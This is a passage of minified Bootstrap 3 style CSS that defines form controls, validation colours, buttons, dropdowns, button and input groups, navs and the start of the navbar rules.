rgba(102,175,233,.6);box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 8px rgba(102,175,233,.6)}.form-control::-moz-placeholder{color:#999;opacity:1}.form-control:-ms-input-placeholder{color:#999}.form-control::-webkit-input-placeholder{color:#999}.form-control::-ms-expand{background-color:transparent;border:0}.form-control[disabled],.form-control[readonly],fieldset[disabled] .form-control{background-color:#eee;opacity:1}.form-control[disabled],fieldset[disabled] .form-control{cursor:not-allowed}textarea.form-control{height:auto}input[type=search]{-webkit-appearance:none}@media screen and (-webkit-min-device-pixel-ratio:0){input[type=date].form-control,input[type=time].form-control,input[type=datetime-local].form-control,input[type=month].form-control{line-height:34px}.input-group-sm input[type=date],.input-group-sm input[type=time],.input-group-sm input[type=datetime-local],.input-group-sm input[type=month],input[type=date].input-sm,input[type=time].input-sm,input[type=datetime-local].input-sm,input[type=month].input-sm{line-height:30px}.input-group-lg input[type=date],.input-group-lg input[type=time],.input-group-lg input[type=datetime-local],.input-group-lg input[type=month],input[type=date].input-lg,input[type=time].input-lg,input[type=datetime-local].input-lg,input[type=month].input-lg{line-height:46px}}.form-group{margin-bottom:15px}.checkbox,.radio{position:relative;display:block;margin-top:10px;margin-bottom:10px}.checkbox label,.radio label{min-height:20px;padding-left:20px;margin-bottom:0;font-weight:400;cursor:pointer}.checkbox input[type=checkbox],.checkbox-inline input[type=checkbox],.radio input[type=radio],.radio-inline input[type=radio]{position:absolute;margin-top:4px\9;margin-left:-20px}.checkbox+.checkbox,.radio+.radio{margin-top:-5px}.checkbox-inline,.radio-inline{position:relative;display:inline-block;padding-left:20px;margin-bottom:0;font-weight:400;vertical-align:middle;cursor:pointer}.checkbox-inline+.checkbox-inline,.radio-inline+.radio-inline{margin-top:0;margin-left:10px}fieldset[disabled] input[type=checkbox],fieldset[disabled] input[type=radio],input[type=checkbox].disabled,input[type=checkbox][disabled],input[type=radio].disabled,input[type=radio][disabled]{cursor:not-allowed}.checkbox-inline.disabled,.radio-inline.disabled,fieldset[disabled] .checkbox-inline,fieldset[disabled] .radio-inline{cursor:not-allowed}.checkbox.disabled label,.radio.disabled label,fieldset[disabled] .checkbox label,fieldset[disabled] .radio label{cursor:not-allowed}.form-control-static{min-height:34px;padding-top:7px;padding-bottom:7px;margin-bottom:0}.form-control-static.input-lg,.form-control-static.input-sm{padding-right:0;padding-left:0}.input-sm{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-sm{height:30px;line-height:30px}select[multiple].input-sm,textarea.input-sm{height:auto}.form-group-sm .form-control{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}.form-group-sm select.form-control{height:30px;line-height:30px}.form-group-sm select[multiple].form-control,.form-group-sm textarea.form-control{height:auto}.form-group-sm .form-control-static{height:30px;min-height:32px;padding:6px 10px;font-size:12px;line-height:1.5}.input-lg{height:46px;padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}select.input-lg{height:46px;line-height:46px}select[multiple].input-lg,textarea.input-lg{height:auto}.form-group-lg .form-control{height:46px;padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}.form-group-lg select.form-control{height:46px;line-height:46px}.form-group-lg select[multiple].form-control,.form-group-lg textarea.form-control{height:auto}.form-group-lg .form-control-static{height:46px;min-height:38px;padding:11px 16px;font-size:18px;line-height:1.3333333}.has-feedback{position:relative}.has-feedback .form-control{padding-right:42.5px}.form-control-feedback{position:absolute;top:0;right:0;z-index:2;display:block;width:34px;height:34px;line-height:34px;text-align:center;pointer-events:none}.form-group-lg .form-control+.form-control-feedback,.input-group-lg+.form-control-feedback,.input-lg+.form-control-feedback{width:46px;height:46px;line-height:46px}.form-group-sm .form-control+.form-control-feedback,.input-group-sm+.form-control-feedback,.input-sm+.form-control-feedback{width:30px;height:30px;line-height:30px}.has-success .checkbox,.has-success .checkbox-inline,.has-success .control-label,.has-success .help-block,.has-success .radio,.has-success .radio-inline,.has-success.checkbox label,.has-success.checkbox-inline label,.has-success.radio label,.has-success.radio-inline label{color:#3c763d}.has-success .form-control{border-color:#3c763d;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 1px rgba(0,0,0,.075)}.has-success .form-control:focus{border-color:#2b542c;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #67b168;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #67b168}.has-success .input-group-addon{color:#3c763d;background-color:#dff0d8;border-color:#3c763d}.has-success .form-control-feedback{color:#3c763d}.has-warning .checkbox,.has-warning .checkbox-inline,.has-warning .control-label,.has-warning .help-block,.has-warning .radio,.has-warning .radio-inline,.has-warning.checkbox label,.has-warning.checkbox-inline label,.has-warning.radio label,.has-warning.radio-inline label{color:#8a6d3b}.has-warning .form-control{border-color:#8a6d3b;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 1px rgba(0,0,0,.075)}.has-warning .form-control:focus{border-color:#66512c;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #c0a16b;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #c0a16b}.has-warning .input-group-addon{color:#8a6d3b;background-color:#fcf8e3;border-color:#8a6d3b}.has-warning .form-control-feedback{color:#8a6d3b}.has-error .checkbox,.has-error .checkbox-inline,.has-error .control-label,.has-error .help-block,.has-error .radio,.has-error .radio-inline,.has-error.checkbox label,.has-error.checkbox-inline label,.has-error.radio label,.has-error.radio-inline label{color:#a94442}.has-error .form-control{border-color:#a94442;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 1px rgba(0,0,0,.075)}.has-error .form-control:focus{border-color:#843534;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #ce8483;box-shadow:inset 0 1px 1px rgba(0,0,0,.075),0 0 6px #ce8483}.has-error .input-group-addon{color:#a94442;background-color:#f2dede;border-color:#a94442}.has-error .form-control-feedback{color:#a94442}.has-feedback label~.form-control-feedback{top:25px}.has-feedback label.sr-only~.form-control-feedback{top:0}.help-block{display:block;margin-top:5px;margin-bottom:10px;color:#737373}@media (min-width:768px){.form-inline .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}.form-inline .form-control{display:inline-block;width:auto;vertical-align:middle}.form-inline .form-control-static{display:inline-block}.form-inline .input-group{display:inline-table;vertical-align:middle}.form-inline .input-group .form-control,.form-inline .input-group .input-group-addon,.form-inline .input-group .input-group-btn{width:auto}.form-inline .input-group>.form-control{width:100%}.form-inline .control-label{margin-bottom:0;vertical-align:middle}.form-inline .checkbox,.form-inline .radio{display:inline-block;margin-top:0;margin-bottom:0;vertical-align:middle}.form-inline .checkbox label,.form-inline .radio label{padding-left:0}.form-inline .checkbox input[type=checkbox],.form-inline .radio input[type=radio]{position:relative;margin-left:0}.form-inline .has-feedback .form-control-feedback{top:0}}.form-horizontal .checkbox,.form-horizontal .checkbox-inline,.form-horizontal .radio,.form-horizontal .radio-inline{padding-top:7px;margin-top:0;margin-bottom:0}.form-horizontal .checkbox,.form-horizontal .radio{min-height:27px}.form-horizontal .form-group{margin-right:-15px;margin-left:-15px}@media (min-width:768px){.form-horizontal .control-label{padding-top:7px;margin-bottom:0;text-align:right}}.form-horizontal .has-feedback .form-control-feedback{right:15px}@media (min-width:768px){.form-horizontal .form-group-lg .control-label{padding-top:11px;font-size:18px}}@media (min-width:768px){.form-horizontal .form-group-sm .control-label{padding-top:6px;font-size:12px}}.btn{display:inline-block;padding:6px 12px;margin-bottom:0;font-size:14px;font-weight:400;line-height:1.42857143;text-align:center;white-space:nowrap;vertical-align:middle;-ms-touch-action:manipulation;touch-action:manipulation;cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;background-image:none;border:1px solid transparent;border-radius:4px}.btn.active.focus,.btn.active:focus,.btn.focus,.btn:active.focus,.btn:active:focus,.btn:focus{outline:thin dotted;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}.btn.focus,.btn:focus,.btn:hover{color:#333;text-decoration:none}.btn.active,.btn:active{background-image:none;outline:0;-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.btn.disabled,.btn[disabled],fieldset[disabled] .btn{cursor:not-allowed;filter:alpha(opacity=65);-webkit-box-shadow:none;box-shadow:none;opacity:.65}a.btn.disabled,fieldset[disabled] a.btn{pointer-events:none}.btn-default{color:#333;background-color:#fff;border-color:#ccc}.btn-default.focus,.btn-default:focus{color:#333;background-color:#e6e6e6;border-color:#8c8c8c}.btn-default:hover{color:#333;background-color:#e6e6e6;border-color:#adadad}.btn-default.active,.btn-default:active,.open>.dropdown-toggle.btn-default{color:#333;background-color:#e6e6e6;border-color:#adadad}.btn-default.active.focus,.btn-default.active:focus,.btn-default.active:hover,.btn-default:active.focus,.btn-default:active:focus,.btn-default:active:hover,.open>.dropdown-toggle.btn-default.focus,.open>.dropdown-toggle.btn-default:focus,.open>.dropdown-toggle.btn-default:hover{color:#333;background-color:#d4d4d4;border-color:#8c8c8c}.btn-default.active,.btn-default:active,.open>.dropdown-toggle.btn-default{background-image:none}.btn-default.disabled.focus,.btn-default.disabled:focus,.btn-default.disabled:hover,.btn-default[disabled].focus,.btn-default[disabled]:focus,.btn-default[disabled]:hover,fieldset[disabled] .btn-default.focus,fieldset[disabled] .btn-default:focus,fieldset[disabled] .btn-default:hover{background-color:#fff;border-color:#ccc}.btn-default .badge{color:#fff;background-color:#333}.btn-primary{color:#fff;background-color:#337ab7;border-color:#2e6da4}.btn-primary.focus,.btn-primary:focus{color:#fff;background-color:#286090;border-color:#122b40}.btn-primary:hover{color:#fff;background-color:#286090;border-color:#204d74}.btn-primary.active,.btn-primary:active,.open>.dropdown-toggle.btn-primary{color:#fff;background-color:#286090;border-color:#204d74}.btn-primary.active.focus,.btn-primary.active:focus,.btn-primary.active:hover,.btn-primary:active.focus,.btn-primary:active:focus,.btn-primary:active:hover,.open>.dropdown-toggle.btn-primary.focus,.open>.dropdown-toggle.btn-primary:focus,.open>.dropdown-toggle.btn-primary:hover{color:#fff;background-color:#204d74;border-color:#122b40}.btn-primary.active,.btn-primary:active,.open>.dropdown-toggle.btn-primary{background-image:none}.btn-primary.disabled.focus,.btn-primary.disabled:focus,.btn-primary.disabled:hover,.btn-primary[disabled].focus,.btn-primary[disabled]:focus,.btn-primary[disabled]:hover,fieldset[disabled] .btn-primary.focus,fieldset[disabled] .btn-primary:focus,fieldset[disabled] .btn-primary:hover{background-color:#337ab7;border-color:#2e6da4}.btn-primary .badge{color:#337ab7;background-color:#fff}.btn-success{color:#fff;background-color:#5cb85c;border-color:#4cae4c}.btn-success.focus,.btn-success:focus{color:#fff;background-color:#449d44;border-color:#255625}.btn-success:hover{color:#fff;background-color:#449d44;border-color:#398439}.btn-success.active,.btn-success:active,.open>.dropdown-toggle.btn-success{color:#fff;background-color:#449d44;border-color:#398439}.btn-success.active.focus,.btn-success.active:focus,.btn-success.active:hover,.btn-success:active.focus,.btn-success:active:focus,.btn-success:active:hover,.open>.dropdown-toggle.btn-success.focus,.open>.dropdown-toggle.btn-success:focus,.open>.dropdown-toggle.btn-success:hover{color:#fff;background-color:#398439;border-color:#255625}.btn-success.active,.btn-success:active,.open>.dropdown-toggle.btn-success{background-image:none}.btn-success.disabled.focus,.btn-success.disabled:focus,.btn-success.disabled:hover,.btn-success[disabled].focus,.btn-success[disabled]:focus,.btn-success[disabled]:hover,fieldset[disabled] .btn-success.focus,fieldset[disabled] .btn-success:focus,fieldset[disabled] .btn-success:hover{background-color:#5cb85c;border-color:#4cae4c}.btn-success .badge{color:#5cb85c;background-color:#fff}.btn-info{color:#fff;background-color:#5bc0de;border-color:#46b8da}.btn-info.focus,.btn-info:focus{color:#fff;background-color:#31b0d5;border-color:#1b6d85}.btn-info:hover{color:#fff;background-color:#31b0d5;border-color:#269abc}.btn-info.active,.btn-info:active,.open>.dropdown-toggle.btn-info{color:#fff;background-color:#31b0d5;border-color:#269abc}.btn-info.active.focus,.btn-info.active:focus,.btn-info.active:hover,.btn-info:active.focus,.btn-info:active:focus,.btn-info:active:hover,.open>.dropdown-toggle.btn-info.focus,.open>.dropdown-toggle.btn-info:focus,.open>.dropdown-toggle.btn-info:hover{color:#fff;background-color:#269abc;border-color:#1b6d85}.btn-info.active,.btn-info:active,.open>.dropdown-toggle.btn-info{background-image:none}.btn-info.disabled.focus,.btn-info.disabled:focus,.btn-info.disabled:hover,.btn-info[disabled].focus,.btn-info[disabled]:focus,.btn-info[disabled]:hover,fieldset[disabled] .btn-info.focus,fieldset[disabled] .btn-info:focus,fieldset[disabled] .btn-info:hover{background-color:#5bc0de;border-color:#46b8da}.btn-info .badge{color:#5bc0de;background-color:#fff}.btn-warning{color:#fff;background-color:#f0ad4e;border-color:#eea236}.btn-warning.focus,.btn-warning:focus{color:#fff;background-color:#ec971f;border-color:#985f0d}.btn-warning:hover{color:#fff;background-color:#ec971f;border-color:#d58512}.btn-warning.active,.btn-warning:active,.open>.dropdown-toggle.btn-warning{color:#fff;background-color:#ec971f;border-color:#d58512}.btn-warning.active.focus,.btn-warning.active:focus,.btn-warning.active:hover,.btn-warning:active.focus,.btn-warning:active:focus,.btn-warning:active:hover,.open>.dropdown-toggle.btn-warning.focus,.open>.dropdown-toggle.btn-warning:focus,.open>.dropdown-toggle.btn-warning:hover{color:#fff;background-color:#d58512;border-color:#985f0d}.btn-warning.active,.btn-warning:active,.open>.dropdown-toggle.btn-warning{background-image:none}.btn-warning.disabled.focus,.btn-warning.disabled:focus,.btn-warning.disabled:hover,.btn-warning[disabled].focus,.btn-warning[disabled]:focus,.btn-warning[disabled]:hover,fieldset[disabled] .btn-warning.focus,fieldset[disabled] .btn-warning:focus,fieldset[disabled] .btn-warning:hover{background-color:#f0ad4e;border-color:#eea236}.btn-warning .badge{color:#f0ad4e;background-color:#fff}.btn-danger{color:#fff;background-color:#d9534f;border-color:#d43f3a}.btn-danger.focus,.btn-danger:focus{color:#fff;background-color:#c9302c;border-color:#761c19}.btn-danger:hover{color:#fff;background-color:#c9302c;border-color:#ac2925}.btn-danger.active,.btn-danger:active,.open>.dropdown-toggle.btn-danger{color:#fff;background-color:#c9302c;border-color:#ac2925}.btn-danger.active.focus,.btn-danger.active:focus,.btn-danger.active:hover,.btn-danger:active.focus,.btn-danger:active:focus,.btn-danger:active:hover,.open>.dropdown-toggle.btn-danger.focus,.open>.dropdown-toggle.btn-danger:focus,.open>.dropdown-toggle.btn-danger:hover{color:#fff;background-color:#ac2925;border-color:#761c19}.btn-danger.active,.btn-danger:active,.open>.dropdown-toggle.btn-danger{background-image:none}.btn-danger.disabled.focus,.btn-danger.disabled:focus,.btn-danger.disabled:hover,.btn-danger[disabled].focus,.btn-danger[disabled]:focus,.btn-danger[disabled]:hover,fieldset[disabled] .btn-danger.focus,fieldset[disabled] .btn-danger:focus,fieldset[disabled] .btn-danger:hover{background-color:#d9534f;border-color:#d43f3a}.btn-danger .badge{color:#d9534f;background-color:#fff}.btn-link{font-weight:400;color:#337ab7;border-radius:0}.btn-link,.btn-link.active,.btn-link:active,.btn-link[disabled],fieldset[disabled] .btn-link{background-color:transparent;-webkit-box-shadow:none;box-shadow:none}.btn-link,.btn-link:active,.btn-link:focus,.btn-link:hover{border-color:transparent}.btn-link:focus,.btn-link:hover{color:#23527c;text-decoration:underline;background-color:transparent}.btn-link[disabled]:focus,.btn-link[disabled]:hover,fieldset[disabled] .btn-link:focus,fieldset[disabled] .btn-link:hover{color:#777;text-decoration:none}.btn-group-lg>.btn,.btn-lg{padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}.btn-group-sm>.btn,.btn-sm{padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}.btn-group-xs>.btn,.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;border-radius:3px}.btn-block{display:block;width:100%}.btn-block+.btn-block{margin-top:5px}input[type=button].btn-block,input[type=reset].btn-block,input[type=submit].btn-block{width:100%}.fade{opacity:0;-webkit-transition:opacity .15s linear;-o-transition:opacity .15s linear;transition:opacity .15s linear}.fade.in{opacity:1}.collapse{display:none}.collapse.in{display:block}tr.collapse.in{display:table-row}tbody.collapse.in{display:table-row-group}.collapsing{position:relative;height:0;overflow:hidden;-webkit-transition-timing-function:ease;-o-transition-timing-function:ease;transition-timing-function:ease;-webkit-transition-duration:.35s;-o-transition-duration:.35s;transition-duration:.35s;-webkit-transition-property:height,visibility;-o-transition-property:height,visibility;transition-property:height,visibility}.caret{display:inline-block;width:0;height:0;margin-left:2px;vertical-align:middle;border-top:4px dashed;border-top:4px solid\9;border-right:4px solid transparent;border-left:4px solid transparent}.dropdown,.dropup{position:relative}.dropdown-toggle:focus{outline:0}.dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:160px;padding:5px 0;margin:2px 0 0;font-size:14px;text-align:left;list-style:none;background-color:#fff;-webkit-background-clip:padding-box;background-clip:padding-box;border:1px solid #ccc;border:1px solid rgba(0,0,0,.15);border-radius:4px;-webkit-box-shadow:0 6px 12px rgba(0,0,0,.175);box-shadow:0 6px 12px rgba(0,0,0,.175)}.dropdown-menu.pull-right{right:0;left:auto}.dropdown-menu .divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}.dropdown-menu>li>a{display:block;padding:3px 20px;clear:both;font-weight:400;line-height:1.42857143;color:#333;white-space:nowrap}.dropdown-menu>li>a:focus,.dropdown-menu>li>a:hover{color:#262626;text-decoration:none;background-color:#f5f5f5}.dropdown-menu>.active>a,.dropdown-menu>.active>a:focus,.dropdown-menu>.active>a:hover{color:#fff;text-decoration:none;background-color:#337ab7;outline:0}.dropdown-menu>.disabled>a,.dropdown-menu>.disabled>a:focus,.dropdown-menu>.disabled>a:hover{color:#777}.dropdown-menu>.disabled>a:focus,.dropdown-menu>.disabled>a:hover{text-decoration:none;cursor:not-allowed;background-color:transparent;background-image:none;filter:progid:DXImageTransform.Microsoft.gradient(enabled=false)}.open>.dropdown-menu{display:block}.open>a{outline:0}.dropdown-menu-right{right:0;left:auto}.dropdown-menu-left{right:auto;left:0}.dropdown-header{display:block;padding:3px 20px;font-size:12px;line-height:1.42857143;color:#777;white-space:nowrap}.dropdown-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:990}.pull-right>.dropdown-menu{right:0;left:auto}.dropup .caret,.navbar-fixed-bottom .dropdown .caret{content:"";border-top:0;border-bottom:4px dashed;border-bottom:4px solid\9}.dropup .dropdown-menu,.navbar-fixed-bottom .dropdown .dropdown-menu{top:auto;bottom:100%;margin-bottom:2px}@media (min-width:768px){.navbar-right .dropdown-menu{right:0;left:auto}.navbar-right .dropdown-menu-left{right:auto;left:0}}.btn-group,.btn-group-vertical{position:relative;display:inline-block;vertical-align:middle}.btn-group-vertical>.btn,.btn-group>.btn{position:relative;float:left}.btn-group-vertical>.btn.active,.btn-group-vertical>.btn:active,.btn-group-vertical>.btn:focus,.btn-group-vertical>.btn:hover,.btn-group>.btn.active,.btn-group>.btn:active,.btn-group>.btn:focus,.btn-group>.btn:hover{z-index:2}.btn-group .btn+.btn,.btn-group .btn+.btn-group,.btn-group .btn-group+.btn,.btn-group .btn-group+.btn-group{margin-left:-1px}.btn-toolbar{margin-left:-5px}.btn-toolbar .btn,.btn-toolbar .btn-group,.btn-toolbar .input-group{float:left}.btn-toolbar>.btn,.btn-toolbar>.btn-group,.btn-toolbar>.input-group{margin-left:5px}.btn-group>.btn:not(:first-child):not(:last-child):not(.dropdown-toggle){border-radius:0}.btn-group>.btn:first-child{margin-left:0}.btn-group>.btn:first-child:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn:last-child:not(:first-child),.btn-group>.dropdown-toggle:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}.btn-group>.btn-group{float:left}.btn-group>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}.btn-group>.btn-group:first-child:not(:last-child)>.btn:last-child,.btn-group>.btn-group:first-child:not(:last-child)>.dropdown-toggle{border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn-group:last-child:not(:first-child)>.btn:first-child{border-top-left-radius:0;border-bottom-left-radius:0}.btn-group .dropdown-toggle:active,.btn-group.open .dropdown-toggle{outline:0}.btn-group>.btn+.dropdown-toggle{padding-right:8px;padding-left:8px}.btn-group>.btn-lg+.dropdown-toggle{padding-right:12px;padding-left:12px}.btn-group.open .dropdown-toggle{-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.btn-group.open .dropdown-toggle.btn-link{-webkit-box-shadow:none;box-shadow:none}.btn .caret{margin-left:0}.btn-lg .caret{border-width:5px 5px 0;border-bottom-width:0}.dropup .btn-lg .caret{border-width:0 5px 5px}.btn-group-vertical>.btn,.btn-group-vertical>.btn-group,.btn-group-vertical>.btn-group>.btn{display:block;float:none;width:100%;max-width:100%}.btn-group-vertical>.btn-group>.btn{float:none}.btn-group-vertical>.btn+.btn,.btn-group-vertical>.btn+.btn-group,.btn-group-vertical>.btn-group+.btn,.btn-group-vertical>.btn-group+.btn-group{margin-top:-1px;margin-left:0}.btn-group-vertical>.btn:not(:first-child):not(:last-child){border-radius:0}.btn-group-vertical>.btn:first-child:not(:last-child){border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn:last-child:not(:first-child){border-top-left-radius:0;border-top-right-radius:0;border-bottom-right-radius:4px;border-bottom-left-radius:4px}.btn-group-vertical>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}.btn-group-vertical>.btn-group:first-child:not(:last-child)>.btn:last-child,.btn-group-vertical>.btn-group:first-child:not(:last-child)>.dropdown-toggle{border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn-group:last-child:not(:first-child)>.btn:first-child{border-top-left-radius:0;border-top-right-radius:0}.btn-group-justified{display:table;width:100%;table-layout:fixed;border-collapse:separate}.btn-group-justified>.btn,.btn-group-justified>.btn-group{display:table-cell;float:none;width:1%}.btn-group-justified>.btn-group .btn{width:100%}.btn-group-justified>.btn-group .dropdown-menu{left:auto}[data-toggle=buttons]>.btn input[type=checkbox],[data-toggle=buttons]>.btn input[type=radio],[data-toggle=buttons]>.btn-group>.btn input[type=checkbox],[data-toggle=buttons]>.btn-group>.btn input[type=radio]{position:absolute;clip:rect(0,0,0,0);pointer-events:none}.input-group{position:relative;display:table;border-collapse:separate}.input-group[class*=col-]{float:none;padding-right:0;padding-left:0}.input-group .form-control{position:relative;z-index:2;float:left;width:100%;margin-bottom:0}.input-group .form-control:focus{z-index:3}.input-group-lg>.form-control,.input-group-lg>.input-group-addon,.input-group-lg>.input-group-btn>.btn{height:46px;padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}select.input-group-lg>.form-control,select.input-group-lg>.input-group-addon,select.input-group-lg>.input-group-btn>.btn{height:46px;line-height:46px}select[multiple].input-group-lg>.form-control,select[multiple].input-group-lg>.input-group-addon,select[multiple].input-group-lg>.input-group-btn>.btn,textarea.input-group-lg>.form-control,textarea.input-group-lg>.input-group-addon,textarea.input-group-lg>.input-group-btn>.btn{height:auto}.input-group-sm>.form-control,.input-group-sm>.input-group-addon,.input-group-sm>.input-group-btn>.btn{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-group-sm>.form-control,select.input-group-sm>.input-group-addon,select.input-group-sm>.input-group-btn>.btn{height:30px;line-height:30px}select[multiple].input-group-sm>.form-control,select[multiple].input-group-sm>.input-group-addon,select[multiple].input-group-sm>.input-group-btn>.btn,textarea.input-group-sm>.form-control,textarea.input-group-sm>.input-group-addon,textarea.input-group-sm>.input-group-btn>.btn{height:auto}.input-group .form-control,.input-group-addon,.input-group-btn{display:table-cell}.input-group .form-control:not(:first-child):not(:last-child),.input-group-addon:not(:first-child):not(:last-child),.input-group-btn:not(:first-child):not(:last-child){border-radius:0}.input-group-addon,.input-group-btn{width:1%;white-space:nowrap;vertical-align:middle}.input-group-addon{padding:6px 12px;font-size:14px;font-weight:400;line-height:1;color:#555;text-align:center;background-color:#eee;border:1px solid #ccc;border-radius:4px}.input-group-addon.input-sm{padding:5px 10px;font-size:12px;border-radius:3px}.input-group-addon.input-lg{padding:10px 16px;font-size:18px;border-radius:6px}.input-group-addon input[type=checkbox],.input-group-addon input[type=radio]{margin-top:0}.input-group .form-control:first-child,.input-group-addon:first-child,.input-group-btn:first-child>.btn,.input-group-btn:first-child>.btn-group>.btn,.input-group-btn:first-child>.dropdown-toggle,.input-group-btn:last-child>.btn-group:not(:last-child)>.btn,.input-group-btn:last-child>.btn:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.input-group-addon:first-child{border-right:0}.input-group .form-control:last-child,.input-group-addon:last-child,.input-group-btn:first-child>.btn-group:not(:first-child)>.btn,.input-group-btn:first-child>.btn:not(:first-child),.input-group-btn:last-child>.btn,.input-group-btn:last-child>.btn-group>.btn,.input-group-btn:last-child>.dropdown-toggle{border-top-left-radius:0;border-bottom-left-radius:0}.input-group-addon:last-child{border-left:0}.input-group-btn{position:relative;font-size:0;white-space:nowrap}.input-group-btn>.btn{position:relative}.input-group-btn>.btn+.btn{margin-left:-1px}.input-group-btn>.btn:active,.input-group-btn>.btn:focus,.input-group-btn>.btn:hover{z-index:2}.input-group-btn:first-child>.btn,.input-group-btn:first-child>.btn-group{margin-right:-1px}.input-group-btn:last-child>.btn,.input-group-btn:last-child>.btn-group{z-index:2;margin-left:-1px}.nav{padding-left:0;margin-bottom:0;list-style:none}.nav>li{position:relative;display:block}.nav>li>a{position:relative;display:block;padding:10px 15px}.nav>li>a:focus,.nav>li>a:hover{text-decoration:none;background-color:#eee}.nav>li.disabled>a{color:#777}.nav>li.disabled>a:focus,.nav>li.disabled>a:hover{color:#777;text-decoration:none;cursor:not-allowed;background-color:transparent}.nav .open>a,.nav .open>a:focus,.nav .open>a:hover{background-color:#eee;border-color:#337ab7}.nav .nav-divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}.nav>li>a>img{max-width:none}.nav-tabs{border-bottom:1px solid #ddd}.nav-tabs>li{float:left;margin-bottom:-1px}.nav-tabs>li>a{margin-right:2px;line-height:1.42857143;border:1px solid transparent;border-radius:4px 4px 0 0}.nav-tabs>li>a:hover{border-color:#eee #eee #ddd}.nav-tabs>li.active>a,.nav-tabs>li.active>a:focus,.nav-tabs>li.active>a:hover{color:#555;cursor:default;background-color:#fff;border:1px solid #ddd;border-bottom-color:transparent}.nav-tabs.nav-justified{width:100%;border-bottom:0}.nav-tabs.nav-justified>li{float:none}.nav-tabs.nav-justified>li>a{margin-bottom:5px;text-align:center}.nav-tabs.nav-justified>.dropdown .dropdown-menu{top:auto;left:auto}@media (min-width:768px){.nav-tabs.nav-justified>li{display:table-cell;width:1%}.nav-tabs.nav-justified>li>a{margin-bottom:0}}.nav-tabs.nav-justified>li>a{margin-right:0;border-radius:4px}.nav-tabs.nav-justified>.active>a,.nav-tabs.nav-justified>.active>a:focus,.nav-tabs.nav-justified>.active>a:hover{border:1px solid #ddd}@media (min-width:768px){.nav-tabs.nav-justified>li>a{border-bottom:1px solid #ddd;border-radius:4px 4px 0 0}.nav-tabs.nav-justified>.active>a,.nav-tabs.nav-justified>.active>a:focus,.nav-tabs.nav-justified>.active>a:hover{border-bottom-color:#fff}}.nav-pills>li{float:left}.nav-pills>li>a{border-radius:4px}.nav-pills>li+li{margin-left:2px}.nav-pills>li.active>a,.nav-pills>li.active>a:focus,.nav-pills>li.active>a:hover{color:#fff;background-color:#337ab7}.nav-stacked>li{float:none}.nav-stacked>li+li{margin-top:2px;margin-left:0}.nav-justified{width:100%}.nav-justified>li{float:none}.nav-justified>li>a{margin-bottom:5px;text-align:center}.nav-justified>.dropdown .dropdown-menu{top:auto;left:auto}@media (min-width:768px){.nav-justified>li{display:table-cell;width:1%}.nav-justified>li>a{margin-bottom:0}}.nav-tabs-justified{border-bottom:0}.nav-tabs-justified>li>a{margin-right:0;border-radius:4px}.nav-tabs-justified>.active>a,.nav-tabs-justified>.active>a:focus,.nav-tabs-justified>.active>a:hover{border:1px solid #ddd}@media (min-width:768px){.nav-tabs-justified>li>a{border-bottom:1px solid #ddd;border-radius:4px 4px 0 0}.nav-tabs-justified>.active>a,.nav-tabs-justified>.active>a:focus,.nav-tabs-justified>.active>a:hover{border-bottom-color:#fff}}.tab-content>.tab-pane{display:none}.tab-content>.active{display:block}.nav-tabs .dropdown-menu{margin-top:-1px;border-top-left-radius:0;border-top-right-radius:0}.navbar{position:relative;min-height:50px;margin-bottom:20px;border:1px solid transparent}@media (min-width:768px){.navbar{border-radius:4px}}@media (min-width:768px){.navbar-header{float:left}}.navbar-collapse{padding-right:15px;padding-left:15px;overflow-x:visible;-webkit-overflow-scrolling:touch;border-top:1px solid transparent;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.1);box-shadow:inset 0 1px 0 rgba(255,255,255,.1)}.navbar-collapse.in{overflow-y:auto}@media (min-width:768px){.navbar-collapse{width:auto;border-top:0;-webkit-box-shadow:none;box-shadow:none}.navbar-collapse.collapse{display:block!important;height:auto!important;padding-bottom:0;overflow:visible!important}.navbar-collapse.in{overflow-y:visible}.navbar-fixed-bottom .navbar-collapse,.navbar-fixed-top .navbar-collapse,.navbar-static-top .navbar-collapse{padding-right:0;padding-left:0}}.navbar-fixed-bottom .navbar-collapse,.navbar-fixed-top 